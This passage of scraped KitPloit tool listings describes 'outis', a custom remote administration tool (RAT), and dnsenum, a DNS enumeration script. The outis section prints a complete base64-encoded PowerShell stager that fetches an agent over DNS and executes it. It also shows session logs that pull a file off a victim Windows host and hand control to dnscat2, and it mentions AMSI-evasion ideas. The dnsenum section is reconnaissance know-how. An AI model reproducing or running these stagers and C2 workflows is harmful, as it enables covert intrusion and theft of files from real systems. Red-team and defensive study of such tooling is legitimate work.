# includes cmd, tempfile, ... 
\n * python-progressbar2 \n * python-dnspython \n * python-crypto \n * python-pyopenssl \n * and maybe more... \nIn other distributions the names may differ, for instance, there is a module named crypto and a module named pycrypto. We need the latter. \nAlso, older versions might cause problems: \n\n\n * pyopenssl needs to be version 16.1.0 or newer, check as follows: \n \n \n $ python3 -c 'import OpenSSL; print(OpenSSL.version.__version__)'\n\nYou can set up a python virtual environment quite easily: \n\n \n \n $ virtualenv outis-venv\n $ source ./outis-venv/bin/activate\n (outis-venv) $ pip install progressbar2 dnspython pycrypto pyopenssl\n\nThis results to the following package list, which seems to work for me: \n\n \n \n $ pip freeze\n appdirs==1.4.3\n asn1crypto==0.22.0\n cffi==1.10.0\n cryptography==1.8.1\n dnspython==1.15.0\n idna==2.5\n packaging==16.8\n progressbar2==3.18.1\n pycparser==2.17\n pycrypto==2.6.1\n pyOpenSSL==16.2.0\n pyparsing==2.2.0\n python-utils==2.1.0\n six==1.10.0\n\n \n** Installation ** \nClone this git with recursive flag to also clone its submodules in the thirdpartytools folder: \n\n \n \n git clone --recursive ...\n\nThe handler runs on Python 3. Install its dependencies and run it. It will generate stagers, agents and everything else for you. \nTo bind low ports without needing root privileges, consider using a capability wrapper. \n \n** Terms ** \n\n\n * ** agent ** : software, that runs on the victim system \n * ** handler ** : software, that parses your commands and leads the agents (usually it runs on your server) \n * ** stager ** : short script that downloads the agent (using the transport module) and runs it \n * ** transport ** : communication channel between stager/agent and handler, e.g. ReverseTCP \n * ** platform ** : victim architecture to use for stager/agent scripts, e.g. 
PowerShell \n \n** Currently Supported Plattforms ** \n\n\n * PowerShell (partial) \n \n** Currently Supported Transports ** \n\n\n * Reverse TCP \n * DNS (types TXT or A for staging, and types TXT, CNAME, MX, AAAA or A for agent connection) \n \n** Currently Supported Cryptography ** \n\n\n * Agent stages can be encoded (for obfuscation, not for security) using cyclic XOR \n * Agent stages can be authenticated using RSA signatures and pinned certificates \n * Transport connections can be encrypted / authenticated using TLS and pinned certificates \n \n** Currently Supported Commands and Controls ** \n\n\n * ping requests to test the connection (partial) \n * text message format (partial) \n * upload and download of files \n \n** Currently Supported Extras ** \n\n\n * When using DNS transport with stager and powershell, you can stage the tool dnscat2 / dnscat2-powershell from the thirdpartytools directory instead of the default outis agent. Set the platform option AGENTTYPE to DNSCAT2 (will take a while, but uses only DNS to stage) or DNSCAT2DOWNLOADER (tries to download using HTTPS). \n \n** Usage Examples ** \nDownload of a file using staged DNS transport with POWERSHELL platform could look like this: \n\n \n \n $ outis\n outis> set TRANSPORT DNS\n outis> set ZONE zfs.sy.gs\n outis> set AGENTDEBUG TRUE\n outis> info\n [+] Options for the Handler:\n Name Value Required Description \n ----------------- ---------- -------- -----------------------------------------------------------------\n TRANSPORT DNS True Communication way between agent and handler (Options: REVERSETCP,\n DNS)\n CHANNELENCRYPTION TLS True Encryption Protocol in the transport (Options: NONE, TLS)\n PLATFORM POWERSHELL True Platform of agent code (Options: POWERSHELL)\n PROGRESSBAR TRUE True Display a progressbar for uploading / downloading? 
(only if not \n debugging the relevant module) (Options: TRUE, FALSE)\n \n [+] Options for the TRANSPORT module DNS:\n Name Value Required Description \n --------- ----------- -------- ------------------------------------------------------------------------\n ZONE zfs.sy.gs True DNS Zone for handling requests\n LHOST 0.0.0.0 True Interface IP to listen on\n LPORT 53 True UDP-Port to listen on for DNS server\n DNSTYPE TXT True DNS type to use for the connection (stager only, the agent will \n enumerate all supported types on its own) (Options: TXT, A)\n DNSSERVER False IP address of DNS server to connect for all queries\n \n [+] Options for the PLATFORM module POWERSHELL:\n Name Value Required Description \n -------------------- -------------------------- -------- ----------------------------------------------\n STAGED TRUE True Is the communication setup staged or not? \n (Options: TRUE, FALSE)\n STAGEENCODING TRUE True Should we send the staged agent in an encoded \n form (obscurity, not for security!) 
(Options: \n TRUE, FALSE)\n STAGEAUTHENTICATION TRUE True Should the stager verify the agent code \n before executing (RSA signature verification \n with certificate pinning) (Options: TRUE, \n FALSE)\n STAGECERTIFICATEFILE $TOOLPATH/data/outis.pem False File path of a PEM with both RSA key and \n certificate to sign and verify staged agent \n with (you can generate a selfsigned cert by \n using the script gencert.sh initially)\n AGENTTYPE DEFAULT True Defines which agent should be used (the \n default outis agent for this plattform, or \n some third party software we support) \n (Options: DEFAULT, DNSCAT2, DNSCAT2DOWNLOADER)\n TIMEOUT 9 True Number of seconds to wait for each request \n (currently only supported by DNS stagers)\n RETRIES 2 True Retry each request for this number of times \n (currently only supported by DNS stagers)\n AGENTDEBUG TRUE True Should the agent print and log debug messages \n (Options: TRUE, FALSE)\n outis> generatestager\n [+] Use the following stager code:\n powershell.exe -Enc JAByAD0ARwBlAHQALQBSAGEAbgBkAG8AbQA7ACQAYQA9ACIAIgA7ACQAdAA9ADAAOwBmAG8AcgAoACQAaQA9ADAAOwA7\n ACQAaQArACsAKQB7ACQAYwA9ACgAWwBzAHQAcgBpAG4AZwBdACgASQBFAFgAIAAiAG4AcwBsAG8AbwBrAHUAcAAgAC0AdAB5AHAAZQA9AFQAWA\n BUACAALQB0AGkAbQBlAG8AdQB0AD0AOQAgAHMAJAAoACQAaQApAHIAJAAoACQAcgApAC4AegBmAHMALgBzAHkALgBnAHMALgAgACIAKQApAC4A\n UwBwAGwAaQB0ACgAJwAiACcAKQBbADEAXQA7AGkAZgAoACEAJABjACkAewBpAGYAKAAkAHQAKwArAC0AbAB0ADIAKQB7ACQAaQAtAC0AOwBjAG\n 8AbgB0AGkAbgB1AGUAOwB9AGIAcgBlAGEAawA7AH0AJAB0AD0AMAA7ACQAYQArAD0AJABjADsAfQAkAGEAPQBbAEMAbwBuAHYAZQByAHQAXQA6\n ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQApADsAJABiAD0AJABhAC4ATABlAG4AZwB0AGgAOwAkAGYAcAA9ACIAWA\n B4AEkAMgArAGUAQgBoAGUAUgBMAFMATQBuAHIAVQBNAFgAbgBnAHIARABTAGQATwAyAGQAOAAwAGMAZAB2AHcAcwBKAGMAYwBGAEIAbgAvAGYA\n LwB3AEoATwBpAEIAVAA4AGIATwA2AHAAZgBXAFgAdwBwAEUATwBQAFAAUgBsAFAAdgBnAE8AbgBlAGcAYwBpAE8AYgBPAGEAZABOAFAAVQBxAH\n 
AAZgBRAD0APQAiADsAJABpAD0AMAA7ACQAYQA9ACQAYQB8ACUAewAkAF8ALQBiAFgAbwByACQAZgBwAFsAJABpACsAKwAlACQAZgBwAC4ATABl\n AG4AZwB0AGgAXQB9ADsAJABwAGsAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAAwACwANwA1ADUAKQA7ACQAcw\n BpAGcAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAA3ADUANQAsADYAOAA0ACkAOwAkAHMAPQBOAGUAdwAtAE8A\n YgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAAxADQAMwA5ACwAKAAkAGIALQAxADQAMwA5ACkAKQA7ACQAcwBoAGEAPQBOAGUAdwAtAE\n 8AYgBqAGUAYwB0ACAAUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBTAEgAQQA1ADEAMgBNAGEAbgBhAGcAZQBk\n ADsAaQBmACgAQAAoAEMAbwBtAHAAYQByAGUALQBPAGIAagBlAGMAdAAgACQAcwBoAGEALgBDAG8AbQBwAHUAdABlAEgAYQBzAGgAKAAkAHAAaw\n AuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAKQAgACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIA\n aQBuAGcAKAAkAGYAcAApACkAIAAtAFMAeQBuAGMAVwBpAG4AZABvAHcAIAAwACkALgBMAGUAbgBnAHQAaAAgAC0AbgBlACAAMAApAHsAIgBFAF\n IAUgBPAFIAMQAiADsARQB4AGkAdAAoADEAKQB9ADsAJAB4AD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5\n AHAAdABvAGcAcgBhAHAAaAB5AC4AUgBTAEEAQwByAHkAcAB0AG8AUwBlAHIAdgBpAGMAZQBQAHIAbwB2AGkAZABlAHIAOwAkAHgALgBGAHIAbw\n BtAFgAbQBsAFMAdAByAGkAbgBnACgAJABwAGsAKQA7AGkAZgAoAC0ATgBvAHQAIAAkAHgALgBWAGUAcgBpAGYAeQBEAGEAdABhACgAJABzAC4A\n VABvAEMAaABhAHIAQQByAHIAYQB5ACgAKQAsACIAUwBIAEEANQAxADIAIgAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG\n UANgA0AFMAdAByAGkAbgBnACgAJABzAGkAZwApACkAKQB7ACIARQBSAFIATwBSADIAIgA7AEUAeABpAHQAKAAyACkAfQA7ACIARwBPAEEARwBF\n AE4AVAAiADsASQBFAFgAIAAkAHMAOwA=\n outis> run\n [+] DNS listening on 0.0.0.0:53\n [+] Sending staged agent (34332 bytes)...\n 100% (184 of 184) |########################################################| Elapsed Time: 0:00:16 Time: 0:00:16\n [+] Staging done\n [+] Waiting for connection and TLS handshake...\n [+] Initial connection with new agent started\n [+] Upgrade to TLS done\n outis session> [+] AGENT: Hello from Agent\n \n outis session> download C:\\testfile.txt /tmp/out.txt\n [+] initiating download of remote file 
C:\\testfile.txt to local file /tmp/out.txt\n [+] agent reports a size of 3295 bytes for channel 1\n 100% (3295 of 3295) |######################################################| Elapsed Time: 0:00:00 Time: 0:00:00\n [+] wrote 3295 bytes to file /tmp/out.txt\n outis session> exit\n Do you really want to exit the session and close the connection [y/N]? y\n outis> exit\n\nOr maybe we want to use dnscat2 for the real deal and just use outis to stage it: \n\n \n \n $ outis\n outis> set TRANSPORT DNS\n outis> set AGENTTYPE DNSCAT2\n outis> set ZONE zfs.sy.gs\n outis> run\n [+] DNS listening on 0.0.0.0:53\n [+] Sending staged agent (406569 bytes)...\n 100% (2185 of 2185) |#######################################################| Elapsed Time: 0:01:17 Time: 0:01:17\n [+] Staging done\n [+] Starting dnscat2 to handle the real connection\n \n New window created: 0\n New window created: crypto-debug\n Welcome to dnscat2! 
Some documentation may be out of date.\n \n auto_attach => false\n history_size (for new windows) => 1000\n Security policy changed: All connections must be encrypted and authenticated\n New window created: dns1\n Starting Dnscat2 DNS server on 0.0.0.0:53\n [domains = zfs.sy.gs]...\n \n Assuming you have an authoritative DNS server, you can run\n the client anywhere with the following (--secret is optional):\n \n ./dnscat --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== zfs.sy.gs\n \n To talk directly to the server without a domain name, run:\n \n ./dnscat --dns server=x.x.x.x,port=53 --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg==\n \n Of course, you have to figure out yourself! Clients\n will connect directly on UDP port 53.\n \n dnscat2> New window created: 1\n Session 1 Security: ENCRYPTED AND VERIFIED!\n (the security depends on the strength of your pre-shared secret!)\n \n dnscat2> sessions\n 0 :: main [active]\n crypto-debug :: Debug window for crypto stuff [*]\n dns1 :: DNS Driver running on 0.0.0.0:53 domains = zfs.sy.gs [*]\n 1 :: command (feynman-win7) [encrypted and verified] [*]\n \n dnscat2> session -i 1\n New window created: 1\n history_size (session) => 1000\n Session 1 Security: ENCRYPTED AND VERIFIED!\n (the security depends on the strength of your pre-shared secret!)\n This is a command session!\n \n That means you can enter a dnscat2 command such as\n 'ping'! 
For a full list of clients, try 'help'.\n \n command (feynman-win7) 1> download c:/testfile.txt /tmp/out.txt\n Attempting to download c:/testfile.txt to /tmp/out.txt\n Wrote 3295 bytes from c:/testfile.txt to /tmp/out.txt!\n \n command (feynman-win7) 1> exit\n Input thread is over\n\n \n** Inspirations ** \nThis project was inspired by (and shamelessly stole part of its code from): \n\n\n * Empire: \n\n * [ https://github.com/adaptivethreat/Empire/blob/master/lib/common/stagers.py ](<https://github.com/adaptivethreat/Empire/blob/master/lib/common/stagers.py>) \u2014 generate_launcher uses an HTTP(S) stager \n * [ https://github.com/adaptivethreat/Empire/tree/master/data/agent ](<https://github.com/adaptivethreat/Empire/tree/master/data/agent>) \u2014 stager (step two after initial launcher) and agent (step three) \n * [ https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py ](<https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py>) \u2014 [ powershell ](<https://www.kitploit.com/search/label/PowerShell>) script generation and stripping \n * Metasploit: \n\n * [ https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/cmdstager.rb ](<https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/cmdstager.rb>) \u2014 CmdStager for bourne, ... 
\n * ReflectiveDLLInjection: \n\n * [ https://github.com/stephenfewer/ReflectiveDLLInjection ](<https://github.com/stephenfewer/ReflectiveDLLInjection>)\n * p0wnedShell: \n\n * [ https://github.com/Cn33liz/p0wnedShell ](<https://github.com/Cn33liz/p0wnedShell>) \u2014 some ideas for AMSI evasion for future use \n * dnscat2: \n\n * [ https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md ](<https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md>) \u2014 ideas on protocol design over DNS \n * [ https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1 ](<https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1>) \u2014 [ powershell ](<https://www.kitploit.com/search/label/PowerShell>) version of the dnscat2 agent \n * dnsftp \n\n * [ https://github.com/breenmachine/dnsftp ](<https://github.com/breenmachine/dnsftp>) \u2014 short script parts for stagers via DNS \n \n** Disclaimer ** \nUse at your own risk. Do not use without full consent of everyone involved. For educational purposes only. \n \n \n\n\n** [ Download outis ](<https://github.com/SySS-Research/outis>) **\n", "cvss3": {}, "published": "2017-09-19T14:00:04", "type": "kitploit", "title": "outis - Custom Remote Administration Tool (RAT)", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2017-09-19T14:00:04", "id": "KITPLOIT:4143386305519508041", "href": "http://www.kitploit.com/2017/09/outis-custom-remote-administration-tool.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-04T00:40:05", "description": "Multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous IP blocks. \n\n\n \n\n\n** OPERATIONS: ** \n\n\n * Get the host\u2019s address (A record). \n * Get the nameservers (threaded). 
\n * Get the MX record (threaded). \n * Perform axfr queries on nameservers and get BIND VERSION (threaded). \n * Get extra names and subdomains via google scraping (google query = \u201callinurl: -www site:domain\u201d). \n * Brute force subdomains from file, can also perform recursion on subdomains that have NS records (all threaded). \n * Calculate C class domain network ranges and perform whois queries on them (threaded). \n * Perform reverse lookups on netranges (C class and/or whois netranges) (threaded). \n * Write the IP blocks to the domain_ips.txt file. \n\n \n\n\n** PREREQUISITES: ** \n \nModules that are included in perl 5.10.0: Getopt::Long IO::File Thread::Queue \nOther necessary modules: Must have: Net::IP Net::DNS Net::Netmask Optional: Net::Whois::IP HTML::Parser WWW::Mechanize XML::Writer \nTo install a module, simply run (as root): \n\n \n \n sudo apt-get install perl-doc\n sudo perl -MCPAN -e shell\n cpan[1]> install XML::Writer\n cpan[2]> install Net::Netmask\n cpan[3]> install String::Random\n\n \nPerl ithreads support: the perl version must be compiled with ithreads support. threads threads::shared \nOPTIONS: run \"perldoc dnsenum.pl\". 
\n \n** USAGE: ** \n\n \n \n [email\u00a0protected]:~# perl dnsenum.pl -h\n dnsenum.pl VERSION:1.2.4\n Usage: dnsenum.pl [Options] \n [Options]:\n Note: the brute force -f switch is obligatory.\n GENERAL OPTIONS:\n --dnsserver \n Use this DNS server for A, NS and MX queries.\n --enum Shortcut option equivalent to --threads 5 -s 15 -w.\n -h, --help Print this help message.\n --noreverse Skip the reverse lookup operations.\n --private Show and save private ips at the end of the file domain_ips.txt.\n --subfile Write all valid subdomains to this file.\n -t, --timeout The tcp and udp timeout values in seconds (default: 10s).\n --threads The number of threads that will perform different queries.\n -v, --verbose Be verbose: show all the progress and all the error messages.\n GOOGLE SCRAPING OPTIONS:\n -p, --pages The number of google search pages to process when scraping names,\n the default is 5 pages, the -s switch must be specified.\n -s, --scrap The maximum number of subdomains that will be scraped from Google (default 15).\n BRUTE FORCE OPTIONS:\n -f, --file Read subdomains from this file to perform brute force.\n -u, --update \n Update the file specified with the -f switch with valid subdomains.\n a (all) Update using all results.\n g Update using only google scraping results.\n r Update using only reverse lookup results.\n z Update using only zonetransfer results.\n -r, --recursion Recursion on subdomains, brute force all discovred subdomains that have an NS record.\n WHOIS NETRANGE OPTIONS:\n -d, --delay The maximum value of seconds to wait between whois queries, the value is defined randomly, default: 3s.\n -w, --whois Perform the whois queries on c class network ranges.\n **Warning**: this can generate very large netranges and it will take lot of time to performe reverse lookups.\n REVERSE LOOKUP OPTIONS:\n -e, --exclude \n Exclude PTR records that match the regexp expression from reverse lookup results, useful on invalid hostnames.\n OUTPUT OPTIONS:\n -o 
--output Output in XML format. Can be imported in MagicTree (www.gremwell.com)\n\n \n \n\n\n** [ Download dnsenum ](<https://github.com/fwaeytens/dnsenum>) **\n", "cvss3": {}, "published": "2017-09-18T21:00:23", "type": "kitploit", "title": "dnsenum - Multithreaded perl script to enumerate DNS information", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2017-09-18T21:00:23", "id": "KITPLOIT:4700475362409254459", "href": "http://www.kitploit.com/2017/09/dnsenum-multithreaded-perl-script-to.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}]}